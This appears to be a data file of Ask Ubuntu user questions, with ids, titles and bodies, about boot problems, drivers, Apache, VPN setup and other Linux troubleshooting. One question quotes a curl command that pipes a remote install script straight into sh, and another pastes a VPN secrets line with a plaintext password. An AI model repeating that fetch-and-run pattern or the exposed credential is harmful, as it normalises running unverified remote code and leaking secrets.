278993	making a bootable usb flash drive which will boot in efi	i have recently bought a laptop with windows 8 ( efi ) installed . i thought i 'd be able to handle installing 12.04.2 relatively easily - how wrong could i be ? using a live-usb i made using startup disk creator on ubuntu with a 64 bit .iso file ... *i first tried to install ubuntu in legacy mode without a boot partition which needless to say did n't work . *i then reinstalled ubuntu with the boot partition , still using legacy . this time i managed to get the grub menu to show up but i only had the choice of booting into ubuntu . ( unless i told it to boot in efi mode and then it only booted windows ) *i tried boot-repair both times and that did n't help things at all . i now realise i ca n't boot ubuntu in legacy mode if windows is booting in efi . so i need to boot from the live-usb in efi mode . but when i enable efi mode and boot from usb flash drive it says : flash drive has been blocked by the current security policy . ( or something to that effect ) is there a problem with the way i made the live-usb ? how am i supposed to boot from the live-usb in efi mode if i get the error message each time ? i realise lots of people are asking these sorts of questions at the moment , but i 've been looking for a while and i have n't found any solutions that work . : / thanks for your help !
278996	ubuntu splash screen is now a gear and boot speed is slow	i installed lxde , gnome , and a whole bunch of other desktop environments the other day , and now while ubuntu boots , the splash screen is now a gear on a gray background , and boot speeds have gone from a few seconds to two minutes . is there any way to change the boot screen back and increase the boot time ?
278997	how to upgrade a 32-bit distro to 64-bit without losing data ?	is it possible to upgrade ubuntu from 11.10 32-bit to 12.10 64-bit ( or the latest version out there ) without losing any of my data ( files , pictures , etc ) ? is it possible to upgrade from 32-bit to 64-bit at all even ? i found this : upgrade from 12.04 to 12.10 without losing files ? but it does n't state if it 's possible to upgrade from 32 to 64 . any help would be nice . thanks !
279001	does ubuntu-gnome 13.04 contain gnome classic session ?	if i understand right , ubuntu-gnome will be using gnome 3 . i was wondering if it also included gnome classic as well , or if i would have to go download it ?
279002	cairo-dock and lxde : cairo-dock is always behind all of the windows .	i have ubuntu installed , and i 'm running it in the lxde environment . when i have cairo-dock running , i have it set to 'always on top ' , however , it sits behind all of the windows . i want the dock to autohide when it 's not being moused over , and pop back up when i touch that side of the screen . i seem to have figured that much out , however , it 's always behind all of the windows i have open . how would i fix this / configure it to work how i want it to ?
279003	can not boot ubuntu on dell latitude 5520	i can not start ubuntu 12.10 from live usb . dell latitude e5520 , intel cote i5 , 4mb ram , 256 gb hdd . usb boot working well . live usb created in untebootin . the startup screen starts and i have options for try , install , etc . when i select an option it is the last thing i can do . then the purple screen shows , system loading starts and gets stuck within a few seconds . i must hard reset the notebook . i can run this on desktop pc ( old ) . same problem i have w kubuntu 12.10 . i have ubuntu 12.04.1 - i can run only this ( as well kubuntu ) . any newer version ( 12.04.2 , ... , x86 or amd64 ) fails . can anyone advise how to pass that ? meanwhile i did following : i run the usb stick w livecd ubuntu 12.10 in my old desktop equipped w amd athlon 64 dual core and ati radeon x3100 graphic card . it did work so i assume it is not issue of corrupted iso file on usb stick . this assuption is stregthened by statement the issue persists on 12.04.2 version and i also did this excercise in last year october with different ubuntu 12.10 download . from my desktop i installed ubuntu 12.10 on external hdd and connected to dell notebook for boot . it boots and brings me to standard grub menu which i can edit . i tried to set parameters into startup script `` no splash '' and `` nomodeset '' . it came again to the purple screen with ubuntu logo and five white dots and froze again . the cpu fan is on full steam and nothing happens . only hard reset helps . i went through advanced menu to linux 3.5.0-27-generic ( recovery mode ) menu . i ran `` dpkg '' , `` fsck : w/o error . i ran `` network '' - this listed a list of plugins . last row showed text modem-manager [ 1433 ] : successfully loaded 20 plugins and got stuck again . on `` failsafex '' option it showed error message ( white box ) the system is running in low-graphics mode . mouse was not working and i coudl only hit enter it did bring me to th menu `` what would you like to do ? '' with four options but i could not select any other than the first one since it did not react on mouse or keyboard . i could not do anything than hard reset .
279006	ca n't boot ubuntu 12.04.2 from iso to install	my computer wo n't boot up the installation iso file from the cd . i 've gone into bios and enabled boot from cd-rom . the system wo n't recognize that it can be boot from this file . i have windows xp . trying to install 12.04.2 . i have x86 architecture . i then changed the bios to only boot from cd-rom and it promts f1 to reboot ( endless loop ) or f2 to setup .
279009	how can i open the .auz ( authorization file ) to authorize ableton live 8.2.2	i want first to say that i am completely new to ubuntu , i installed it one week ago . i already watched the solutions to this problem and tried them all : i checked on system32 that all the necessary .dll where there and imported the missing ones . to open ableton live i need to open the authorization ( .auz ) but i did n't manage and there is no program in the `` open with '' that allows that . i do n't know if adding ableton live to the open with apps could help , but i do n't know how to do that too , i tried looking in the forums but i did n't manage . maybe this command could be useful $ wine live.exe `` c : \foo.auz '' but i typed it in the terminal and did not work . as i said i am totally new to ubuntu and do n't know how to work with properly . if someone could explain me how to manage to open the .auz file and let ableton work it would be amazing , cause i am really getting crazy and have no idea how to manage by myself . thank you in advance ! ! !
279015	how to get windows 7 and ubuntu 12.10 to boot on my macbook pro	i have a macbook pro retina and i have apple , refit , windows 7 and ubuntu 12.10 installed . when i first installed ubuntu i got the error missing operating system . but windows 7 and mac was booting/working fine . so i made a partition for the boot loader ( instead of using the partition i use for ubuntu ) , and when i told refit to boot linux , it would just freeze on the boot icon . but windows 7 and mac booted/worked fine . then when i chose linux it would boot windows 7 instead . that has stopped , and now linux and windows 7 gets stuck on the boot icon ! what is happening ? ! this is my first time with ubuntu and refit , so i could really use some help . thanks
279021	how to check if cache is working	is there a way to check if disk cache is working on a regular sata disk ? i see `` asking for disk cache failed '' error messages , but discovered my laptop has a 1gb solid state drive without a partition . i saw it in disk utility . so if i can confirm that the hdd has a working cache then my next goal will be to setup ubuntu to use the solid state for swap instead of the swap area on the hdd .
279026	are keyboard layout settings handled by two different applications in xfce ?	as seen in my answer here , trying to make certain keyboard settings in xfce i am faced by two separate options . one is in menu/settings/keyboards ( xfce4-keyboard-settings ) and displays this window : the other is in the properties of the 'keyboard layouts ' applet ( xfce4-xkb-plugin ) of the xfce panel . it seems that the settings made in the latter are the ones that count , while those of the former are pointless . ( see linked answer for details . ) what to make out of this ? - is there potential conflict here ? what to do ? i am in quantal and xfce , xfce4-panel 4.10.0 , xfce4-settings 4.11 , xfce4-xkb-plugin 0.5.4.3 .
279027	how to set up apache user and group to current ?	when i trying to install some cms it could n't create config files because apache user is different . on os x i solved this problem by adding user and group inapache2.conf , but on ubuntu i ca n't figure out what group i should add .
279038	ubuntu 12.04.2 server edition minimum specification ?	i have an old pc that i was planning too setup as a nas system and i 'm not really up there on tech knowledge . i was wondering could someone please give me some guidance as to what the minimum specifications this computer would require to run the server edition of ubuntu , or will the ubuntu server run at all on a really old pc .
279039	making a bootable , 'portable ' usb drive	i have a leftover laptop drive and sata - usb adapter . i 'd like to make it bootable and 'portable ' . would it be able to recognize host machine 's network card for instance ? for the sake of experiment i installed latest distro of suse ( curiosity ) . all went well except when it booted it would not recognize my wireless network . i shut down the laptop i had it plugged into , un-plugged it and tried to boot the laptop . of course grub was hosed ( fixed it with no problems ) . the interesting thing was when i booted from ubuntu live cd to fix grub , my wireless network was recognized just fine . when i tried to plug in the usb drive , rebooted and hoped to boot into the usb drive - no joy . any suggestions on where to start with making such an autonomous ubuntu set up ? 4/11/13 figured it out . took my desktop and unplugged all the hardrives . booted from live dvd . plugged in the laptop drive through usb connector . run installer and got a 'normal ' install on the hard drive . note to self : get esata case and cable for the drive , booting from the drive via usb a bit too slow .
279040	how to get kde taskbar to display notifications icons on right	i was trying to fix some settings on the taskbar panel and all the tray icons , such as the clock , the clipboard , the search service etc have all now moved to the left side of the taskbar . is there some way to get them back to the left ? i have tried changing the alignment via the panel settings > more settings > panel alignment menu , but that does n't work . any ideas ?
279046	no option to print in black and white in document viewer ( evince )	i swear i used to be able to select colour output in 12.10 but i 'm working in 12.04 now and i simply ca n't figure out how to adjust the colour for printing . seems like that option has disappeared .
279048	how do i gracefully delete un-needed kernels ?	i 'm running a bit low on disk space and noticed that i have several kernels that i 'm probably never going to use taking up space . there was a program called computer janitor that cleaned things up ( and a lot of things that you did n't want cleaned up ) , but i ca n't find it . is there a preferred alternative ? many thanks !
279059	12.04 not mounting kindle 3	i 've tried plugging in my kindle ( 3rd generation-keyboard ) , but nothing happens when i do . it 's not seeing the device anywhere . i 've tried re-booting the kindle while plugged in , i 've installed calibre and i 've tried a couple of other suggestions i 've seen mentioned in the forums . still nothing . any suggestions or anyone else with the same problem ? thanks for any help !
279066	where is the icon to kick off steam ?	i have installed steam in ubuntu 12.10 but can not figure out which icon to use to start steam or really , even where it is . confused ! help ! some help
279068	the owner of files in 13.04	why is the owner of files set to a user called `` me '' in 13.04 beta 2 64bit live desktop and also after install ? after installation , it also wo n't let me change the permissions as root or take ownership away from user `` me '' even if i create a new user . anyone help ? i never created a user called `` me '' .
279074	no desktop , only background with the unity plugin	i tried all this stuff . press ctrl+alt+f1 and log in . install the jibby you 'll need to configure the settings by running this : sudo apt-get install compizconfig-settings-manager then run it . the first part tells the terminal which display you want it to load on ( otherwise it wo n't have a clue ) . export display=:0 ccsm press ctrl+alt+f7 ( or ctrl+alt+f8 sometimes ) to get back to the graphical display where there should be a compizconfig settings manager screen sitting there . find the unity plugin . enable it . everything should spring into life but if it does n't , you might have to restart . you can do that by going back to tty1 and running sudo reboot . but none of it worked . i have uninstalled and reinstalled , but nothing . i also have checked to make sure the unity plugin is enabled .
279079	lightdm-gtk-greeter 's background wallpaper is distorted in ubuntu 12.04 ( how i can correct background wallpaper errors in `` lightdm-gtk-greeter '' ?	changed my settings into `` lightdm-gtk-greeter '' to be able to select different languages at login each time i wish . everything is fine with my pc . it logins correctly after a while with an exception that background wallpaper is distorted as seen in the sample picture ( http : //imgur.com/kpw2net ) i installed super-boot-manager and using it . is it possible that plymouth has caused into this ? how i can correct background appearance ? thank you in advance . hejar .
279080	how can i change the download server for updates ?	i continuously failed to upgrade my ubuntu from 11.04 to 12.04 . i tried running these commands : sudo apt-get upgrade sudo apt-get update do-release-upgrade but none of them work . the error they give is usually one of these : failed to fetch ... some index files failed to download . they have been ignored , or old ones used instead . some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . i searched from this site , and just that it could be coming from update server . people recommended to edit in ubuntu software center , from `` main server '' to `` best server '' or `` server of us ' ... but i ca n't find these options in my software center . but my ubuntu software center is not providing any menus like that , instead , it seems like just download center like app store of mac . how can i change the download server for update of my machine ? ps ) sudo update-manager gives following error warning : can not get name for ' < cellrenderertext object at 0x22670a0 ( gtkcellrenderertext at 0x23ff150 ) > ' warning : can not get name for ' < textbuffer object at 0x233c550 ( gtktextbuffer at 0x1d95100 ) > ' mirror : mirror.umoss.org - time : 0.139289855957 mirror : www.club.cc.cmu.edu - time : 0.146475076675 mirror : mirrors.acm.jhu.edu - time : 0.1808989048 mirror : linux.ntuoss.org - time : 0.18235206604 mirror : ubuntu.cybercomhosting.com - time : 0.862604856491 mirror : ftp.tku.edu.tw - time : 1.88249111176 and the winner is : mirror.umoss.org warning : can not get name for ' < cellrenderertext object at 0x1f21c80 ( gtkcellrenderertext at 0x2169150 ) > ' warning : can not get name for ' < textbuffer object at 0x2098d70 ( gtktextbuffer at 0x1aff100 ) > ' authenticate 'oneiric.tar.gz ' against 'oneiric.tar.gz.gpg ' extracting 'oneiric.tar.gz' warning : failed to read mirror file please somebody help me : (
279088	google chrome `` flickering ''	i am having a problem with google chrome on ubuntu 12.10 64 . on about 20-30 % of web sites the page comes up and starts `` flickering '' . it seems like there is a different or partial rendering of the page in a different buffer and several times per second the page swaps between the two screen buffers , causing a kind of epileptic flashing of different images . i can also not scroll the page when it is in this flickering state , any attempt to scroll causes the page to go to the top again on the next flicker . i am using the fglrx driver if that means something : $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7900 series opengl version string : 4.2.12002 compatibility profile context 8.961 chrome version is : google chrome 25.0.1364.172 ( official build 187217 ) any ideas ?
279095	created x11 cursor . how do i install to 12.04 ?	i created a new cursor to replace the arrow ( and only the arrow ) . how do i install my new x11 cursor on ubuntu 12.04 ?
279100	laptop battery is not recognized in ubuntu 12.04	i recently installed ubuntu 12.04 on my laptop . ubuntu does not recognize the battery , even though the battery is connected .
279101	trying to install ubuntu 12.10 on ibook g4 from a usb key	i want to install ubuntu on my ibook g4 , but i can not use livecd because a cd is stuck in the drive lol ... it 's been a year or so . i 've tried everything excepted opening it up but yeah ... i 've thought the only good alternative would be to use a bootable usb thumb drive . so as far as i understand , the mac can not boot from an .iso - > i converted the iso into an .img following these instructions : how to install ubuntu on macbook using usb stick from help.ubuntu.com unfortunatly , later after `` burning '' the .img on the drive , i immediatly get an error message telling me that : `` you have inserted a disk containing volumes that mac os x ca n't read . after what if i boot and hold the alt button to get to boot menu , i see only my hardrive and not my usb key . but i followed all of the instructions ... does anyon have an idea about the issue ?
279105	how can i remove cairo dock from my desktop after having uninstalled it ?	i have uninstalled cairo dock and now that i have done this , it is still attached to my desktop . every time i reboot the computer and sign in , a warning shows up on my desktop regarding my installation . i would like to get rid of it all together but i am not sure how . it seems as though all is uninstalled except the toolbar . how can i fix this ?
279109	gedit , evince has print disabled	print menu command is disabled in evince and gedit . print functionality works fine in other applications like chrome , gimp , firefox . ubuntu printer setup correctly recognizes my printer and scanner uses the the scanner from the printer device perfectly . i noticed it in 12.10 and it is still there on upgrade to 13.04 . i even opened a bug for this but it has remained in incomplete state for too long . https : //bugs.launchpad.net/ubuntu/+source/evince/+bug/1085212
279114	how to bypass updating the .iceauthority file during login ?	i have an ubuntu environment that each user is given a fixed amount of disk space for their home folder . unfortunately once the users filled up their home folder , they will not be able to login , simply because ubuntu is unable to update the file .iceauthority stored in users ' home folder . it 's not feasible to allocate more diskspace to each user , so i am asking is there a way to tell the system to bypass updating iceauthority duing login ? cheers , pan
279115	how to make lyrical music video ?	i 'm trying to make a lyric video for my friends band . i wanted to make a video with the album art and have the lyrics appear and leave the screen with some effects . i 've downloaded programs like blender , openshot , and cinelerra . i 'm just unsure if these are the right program that i need . here are two example of what i 'm trying to do : http : //www.youtube.com/watch ? v=crjoazuccqg http : //www.youtube.com/watch ? v=d1-uiclqwlm
279125	asking for cache data failed | assuming drive cache : write through . ubuntu 12.04 lts gui doesnot appear	i recently installed ubuntu 12.04 on my hard drive partition of 10 gb . i was uninstalling some software and after that this messages started coming up on a black full screen . asking for cache data failed assuming drive cache : write through i restarted my machine and when i boot into ubuntu this messages shows up . only command line is available . i can enter my username and password on the command line and the prompt appears . user @ user-pc $ : but the gui does n't shows up . what to do ? please help .
279126	libreoffice-core seems to have corrupted	i had libreoffice version 3.x installed along with my ubuntu version 11 . after i did the upgrade to 12.04 , my libreoffice behavior changed . i decided to upgrade tto libre office 4x . during the setup since i was getting errors on desktop integration , i tried removing version 3 of libreoffice . this seems to have caused problem with some of libreoffice files , which seems to be essential to run different application . libreoffice-core- depends libreoffice-common has unmet dependencies now , my update manager does n't work and i having problems installing any new apps . is there a solution to fix this problem without having to re-install ubuntu ? i tried to do repair of libreoffice.. did n't work . cheers anil rao
279127	does n't raring mainline kernel ( ppa ) v.3.8.3 support aufs ?	i need ubuntu kernel v 3.8 to include support for aufs feature . i downloaded kernel from here http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.8.3-raring/ linux-image-3.8.3-030803-generic_3.8.3-030803.201303141650_i386.deb linux-headers-3.8.3-030803_3.8.3-030803.201303141650_all.deb i installed them . command is : $ sudo dpkg -i linux-*.deb this is created /boot/vmlinuz-3.8.3-030803-generic and /boot/initrd.img-3.8.3-030803-generic and /boot/initrd.img-3.8.3-030803-generic . i execute following command : $ grep aufs boot/config-3.8.3-030803-generic i think this kernel image does n't support aufs feature , or does it ? i also want to know how to enable aufs feature . is a kernel rebuild required ? where do i get ubuntu kernel v.3.8 's source code ? i ca n't get apt command . this does n't exist in precise 's repository .
279133	how do i get jmol to show implicit hydrogens ?	for some reason when i use jmol it fails to show implicit hydrogens even when i have the box labelled , `` show hydrogens '' ticked . how do i overcome this problem ? i am running 32 bit 12.10 on a dell vostro 3500 laptop with 3.7 gb ram and 4 2.53 ghz processors . it has never worked for me . when i go into the unity panel menu and click `` about this computer '' the pop-up box tells me i have unknown graphics . when i go to the page http : //chemapps.stolaf.edu/jmol/jmol.php which has jmol embedded into the page i see the implicit hydrogens .
279140	is there an application to manage config files in the /etc folder with version control software ?	i want make version control for config files in ubuntu server . but i found out it 's not easy for simply `` git '' whole etc folder , because so many file does n't need to track and some time system will write some files like logs should ignore . is there an application can do that and make it easy ? if it based on git that is better .
279141	how can i make synergy accommodate the dead space around dual monitors ?	i have desktop with two monitors ( monitors 1 and 2 ) and a laptop ( monitor 3 ) . i 've placed the laptop below the desktop using synergy 's interactive configuration screen . the resulting behavior is that one of the desktop 's monitors connects to half of the laptop 's screen : but given the laptop 's physical position , this arrangement would make more sense : how can i make it do that ?
279143	ubuntu 12.10 dual boot 2 of the same versions	i recently installed ubuntu 12.10 on my pc since 12.04 felt super unstable this is a slight improvement.. any way when i start up my pc there are 2 ubuntus in boot up that run the same os nothing in difference , along with windows vista so there is something like this : *windows vista *ubuntu - ( problem ) *ubuntu - how can i just have one ubuntu and please do n't tell me i need to have everything obliterated ! i do n't want to remove ubuntu all over again its super annoying and a pain .
279153	how to setup audio streaming server ?	i need to set up a live audio streaming server on a machine running ubuntu 12.04 lts . ( it will be for conference purpose , voice not music ) . i would like to do it through http . i need only one feed ( source will be soundcard microphone ) . clients will be running windows system . there will be maximum 10-15 clients . i do n't have experience in streaming . there are many solutions for that : pulseaudio , avserver , icecast , shoutcast etc . which one to choose and how to start ?
279159	touchpad is not smooth	i am using a dell latitude e5510 laptop and ubuntu 12.04 and the the mouse pointer from touchpad is not smooth . i tried to configure the speed but it is not smooth . help me to solve this issue .
279161	how to open .deb from nautilus with apturl ?	i want to open .deb-files by double-clicking with apturl - the same way as packages are installed from ubuntuusers.de with firefox . instead , the software-center opens everytime . i ca n't see an entry for apturl when right-clicking .deb-files , 'open with ' - just software-center or archivemanager . how to do this ?
279168	detect if its ubuntu linux os in makefile	i want to create a makefile that will compile my objects and name them according to the linux distro ( e.g . suse , redhat , or ubuntu ) . how can i detect if the os is ubuntu or not ?
279172	upgrade git on ubuntu 10.04 ( lucid lynx )	i currently have git 1.7.1.0 installed but need to upgrade to 1.7.1.1 ( at least ) . i tried running : sudo apt-get update sudo apt-get upgrade and also tried sudo apt-get install git-core but each time i get a message indicating that there is no later version of git available . i have the following software sources configured in /etc/apt/sources.list deb http : //ubunturepo.de.bonial.lan lucid main restricted multiverse universe deb http : //ubunturepo.de.bonial.lan lucid-security main restricted multiverse universe deb http : //ubunturepo.de.bonial.lan lucid-updates main restricted multiverse universe deb http : //archive.canonical.com/ lucid partner deb http : //ppa.launchpad.net/ubuntugis/ubuntugis-unstable/ubuntu lucid main deb-src http : //ppa.launchpad.net/ubuntugis/ubuntugis-unstable/ubuntu lucid main deb http : //archive.ubuntu.com/ubuntu lucid multiverse universe
279176	how to add keyboard shortcuts to awesome wm	i 've installed awesome3 wm on ubuntu server 10.04 . i managed it to work properly now i could use some keyboard shortcuts to start programs like gmrun , firefox or whatever .
279180	nvm command not found issue	attempted to add to this question : nvm command not found , however was n't able to . after installing nvm im having the same issue , here is the log from terminal : michael-imac : ~ michaels_imac $ curl https : //raw.github.com/creationix/nvm/master/install.sh | sh % total % received % xferd average speed time time time current dload upload total spent left speed 100 1202 100 1202 0 0 5759 0 -- : -- : -- -- : -- : -- -- : -- : -- 6829 = > nvm is already installed in /users/michaels_imac/.nvm , trying to update = > already up-to-date . michaels-imac : ~ michaels_imac $ nvm install 0.8 -bash : nvm : command not found
279185	how is there a 3.1 gb filesystem without hard drives in ubuntu live	i am running ubuntu live without any hard drives installed in my pavillion and there is a 3.1 gb file system . it is not on the dvd-r that i put ubuntu live on . it also appears that someone is manipulating the info and tweaking my live session . how is this possible ?
279191	errors when trying to restart apache	when trying to restart apache ( with : service apache2 restart ) , i get the following error : /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . when i try to restart it with another command ( sudo /etc/init.d/apache2 restart ) , i get the following error : * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername i had previously edited etc/apache2/httpd.conf with : servername localhost in order to resolve the above issue , but it seems not to have worked . can anyone help me out with this ?
279192	is it possible to reserve/limit the network usage for certain processes ( applications ) ?	is it possible to reserve ( at least so much bandwidth ) or limit ( no more than so much bandwidth ) the network usage of certain processes or applications . alternatively , reserve/limit the network usage of an/some user ( s ) and or groups ? i 'm interested in ... : limiting the bandwidth of specific process ( pid ) . limiting the bandwidth of each process by a certain name ( e.g . each instance of rtorrent could not use more than 20kb/s , but five instances could thus use 100kb/s ) . limiting the usage of all instances of program ( e.g . all instances of rtrorrent could use no more than 50kb/s ) . limiting the usage of groups of programs - either for each and/or collectively ( e.g . any - or all - web-browsers ( obviously they 'd be listed somewhere ) could use no more than 100kb/s ) . bonus : is it possible to place a per-computer limit ? i have two coumputers sharing on internet-connection , and sometimes one takes all the bandwidth . on the other hand , sometimes one computer uses non or very little bandwidth , so then the other obviously should be able to take all there is . i would be satisfied by setting a hard limit of about half for each ; but a more dynamically approach that allowed one to take all when the other was not used , would be desirable . i have no idea what is possible or how it may be done , which is why i 'm asking . i plagued by the web-browser timing-out , while i use wget or bittorrent-clients to download files , so i 'd like to impose some limits to ensure the ability to browse .
279198	ca n't boot into windows 8 from ubutnu boot screen on startup	so yesterday i installed ubuntu 12.10 along side windows 8 on a separate partition . the installation went fine but now when i turn on the pc ( asus s200e ) i get the ubuntu boot screen asking for my os selection . there is ubuntu , ubuntu advanced settings , windows recovery environment , window launcher . if i choose ubuntu it works but if i choose windows launcher it comes up with 'could not find command drivemap ' and 'invalid efi file path ' ( from memory ) . however , i can get into windows if i shut down the pc in ubuntu with the physical power button ( i.e . not the software power down ) and then hold esc when the asus logo appears , to choose the boot option , and select the windows 8 drive , by the way two ubuntu drives come up here which was not expected . before , when i used the windows installer for ubuntu and it did not work ( got loads of errors ) there was an boot up screen that said `` do you want to boot windows 8 or ubuntu ? '' where as that gone ? and why ca n't i boot windows from the ubuntu boot screen ?
279200	error while adding a watermark to mp4 with ffmpeg	i try to watermark an mp4 file with ffmpeg and the following command : ffmpeg -i originalvideo.mp4 -vf âť movie=watermark.png [ wm ] ; [ in ] [ wm ] overlay=0:0:1 [ out ] âť watermarkedvideo.mp4 after some process i get this error : [ null @ 0x168f5e0 ] unable to find a suitable output format for ' [ wm ] ' [ wm ] : invalid argument [ in ] [ wm ] : command not found edit : finally command wasnt correct , this one work . ffmpeg -i originalvideo.mp4 -vf `` movie=wartermark.png [ watermark ] ; [ in ] [ watermark ] overlay=main_w-overlay_w-3 : main_h-overlay_h-3 [ out ] '' outputvideo.mp4
279202	gimp : toolbox display & main window resize issues in 12.10	i recently installed 12.10 . when gimp is launched , its main window extends below the bottom of the screen , and can not be resized vertically , only horizontally . also , the toolbox window is n't displayed correctly ; it does n't have a title , nor is it framed . instead , all the toolbox icons appear in a single column that extends below the bottom of the screen . the problem persists after reinstalling gimp . in case it 's relevant , i 'm having two other graphics-related issues : text in firefox frequently gets garbled , and the whole system periodically freezes , either for a few seconds or without returning to normal . i 'm running intel integrated graphics ( controller i915 ) .
279207	/usr/share/apport/apport-gpu-error-intel.py - another case of this issue on 12.04 update	i am aware that this has already been reported in various places , i 've searched using the forum and the 'similar questions ' but i 've not seen any solutions as of yet . hopefully this question will aid in identifying the issue and creating a fix and apologies if there is already a fix and i 've missed it . i recently updated 12.04 using the system update manager , rebooted and system would crash within seconds of loading x server . sometimes with a generic `` system error '' popup , and sometimes with nothing . i 'm on a 64 bit machine with custom graphics drivers installed ( this may be relevant as discussed below the error log output ) . after 10 or so reboots i finally managed to get to the error by clicking on 'more information ' in a different pop-up . here is the output : executable path - /usr/share/apport/apport-gpu-error-intel.py package - xserver-xorg-video=intel 2:2.17.0-1ubuntu4.3 problem type - crash title - [ sandybridge-gt1 ] gpu lockup render.ipehr : 0x41c000000 could n't get to anything else before the system locked entirely and had to reboot . i noticed in another question that the issue might be in relation to transparencies and i 'm wandering if it 's something to do with the proprietary nvidia graphics drivers installed rather than the generic graphics drivers . maybe this was n't tested prior to the release of the update ? any thoughts or advice on where to go from here greatly appreciated , this is a mission critical machine so i 'd like to avoid reinstalling the os if i can as ( 99 % sure ? ) that will overwrite the configuration of apache etc . thanks and again , apologies , if any of this is duplicate information or has already been answered . cheers , matt update : i booted into ubuntu but an older linux kernal and all worked fine , issue is definitely with the kernal , which i assume means relates to drivers . anybody know how to remove custom graphics drivers and reinstall the generic ones ? when i boot into the older kernal i just get 'unknown ' drivers so no idea what it 's actually running .
279209	ubuntu 12.10 disks - where is connect to server ?	it use to be that when you ran 'disk utility ' ( up to 12.04 ) you had the option to connect to a remote server ( running udisk ) to view/manage storage . what happen to this feature ? what happened to this ability here : http : //code.duffy.jp/use-disk-utility-to-manage-remote-server-in-ubuntu-10-04/
279214	ca n't get office 2010 to run under wine	i ca n't get microsoft office 2010 home and student to install on ubuntu 12.10 under the latest version of wine . i 've tried both the 32- and 64 bit installers but they both fail about two thirds of the way into the installation . how can i install office 2010 using wine ?
279215	problem setting up pptpd	i 'm attempting to set up a vpn from my android phone to my home computer using pptpd on ubuntu 12.10 . i have so far done the following . setup a virtual nic like this ... cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth0:0 iface eth0:0 inet static address 192.168.0.1 netmask 255.255.255.0 and then configured pptpd like this ... ( commented line has been omitted to save space ) cat /etc/pptpd.conf option /etc/ppp/pptpd-options debug logwtmp localip 192.168.0.1 remoteip 192.168.0.100-200 /etc/ppp/pptpd-options name pptpd refuse-pap refuse-chap refuse-mschap require-mschap-v2 require-mppe-128 proxyarp nodefaultroute debug lock nobsdcomp /etc/ppp/chap-secrets andreas * a5okg4b99 * but all i get from syslog even with debug turned on is.. apr 8 14:53:25 ellit pptpd [ 19488 ] : mgr : connections limit ( 100 ) reached , extra ip addresses ignored apr 8 14:53:25 ellit pptpd [ 19489 ] : mgr : manager process started apr 8 14:53:25 ellit pptpd [ 19489 ] : mgr : maximum of 100 connections available and when i finaly try to connect with my phone all it says is ... apr 8 14:29:43 ellit pptpd [ 25180 ] : mgr : dropped small initial connection i do n't realy know where to go from here ... have i made and error in thinking that a virtual nic will work and why ca n't i get any debug information even when i asked for it in the configurations ? edit : the last line when i try to connect seems to appear somewhat random , i can right now not reproduce it but i fairly sure it related to my connection attempt before and i have not changed anything from then . i 'm starting to suspect that my android isp is blocking vpn but that would be ... insane .
279216	how do i get the ralink 3290 wireless card working on an asus x55c ?	i have asus x55c tried with 10.04 and 12.04 , no wifi drivers . my network controller is ralink corp . suggest how to install wifi drivers in asus x55c . suggest deb packages . . . lspci -nnk | grep -ia2 net shows ... 02:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ] subsystem : foxconn international , inc. device [ 105b : e055 ] 02:00.1 bluetooth [ 0d11 ] : ralink corp. device [ 1814:3298 ] -- 03:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) subsystem : asustek computer inc. device [ 1043:14c7 ]
279220	i ca n't adjust my screen brightness using fn+arrow left or fn+arrow right ( acer aspire v5 )	i 'm using acer aspire v5 ( windows 8 ) . i have a problem regarding my screen brightness . although i can still adjust it but i ca n't using fn+arrow left or fn+arrow right . i visited the ease of access on my settings and tried to turn on high contrast . after that , i ca n't adjust my screen brightness using my keyboard anymore . please do help me . thank you .
279222	can i get transmission to quit instead of minimize ?	transmission has this incredibly aggravating tendency to not stop when i click the exit button . instead , it minimizes . when i click to exit , i want the program to cease immediately , but i ca n't figure out how to do so via the preference menus . is there even a way to do this ?
279228	how to recover ubuntu 12.04	ubuntu is my main os and i have windows as a vm . i made a mistake and rebooted while it was upgrading to 12.10 and now my machine can not boot to os . how can i recover my files before i do a clean install ?
279231	how do i run java programs in ubuntu ?	i tried to run a java program ( .jar ) in ubuntu using the default java ( jdk if i 'm not mistaken ) but i could n't so i tried to install it following these instructions but i still ca n't . what should i do ? how do i revert what i just did following that link ?
279233	how to shut down the system while using gnome desktop environment in ubuntu 11.10	i am using ubuntu 11.10 , and i have gnome and kde desktop environments installed on it . while i am using unity , i am able to see the shutdown option and able to shutdown the system by clicking that option . but i am unable to find such an option if i am logging in selecting gnome . in gnome i have options to log-out and suspend . but this is not what i want . is there a way similar to that what we have in unity ?
279244	what is the risk on not updating ubuntu after installing it from a cd ?	i have an ubuntu 12.4 cd . if i install it to my computer , is it mandatory to install the updates it shows when i boot from it ? what are the risk involved in not installing the updates ? i will be using the system mainly at home for personal use , i will be connecting to internet for mail , chat and surfing .
279248	can i cancel my install in process ?	i have severe problem ... i already had ubuntu 12.10 with windows 7 , but ubuntu began to fail and wanted to reinstall it , but the installation takes 20 hours and not advancing , stayed in `` unpacking flashplugin-installer '' . what i can do ? no way to cancel the installation and try again ?
279254	bash : delete word ahead of cursor	consider the following bash prompt , where ^ denotes the prompt location : svn commit -m very/long/path/to/some/file `` [ bug 123456 ] fix the pixel issue '' ^ i 'd like to commit a different file with the same message . how can i delete the current word , from cursor location to the next space ? is there also a shortcut for backward deletion , form the cursor to the first space backwards ? update : ctrl+w erases backwards , but which shortcut erases one word forward ?
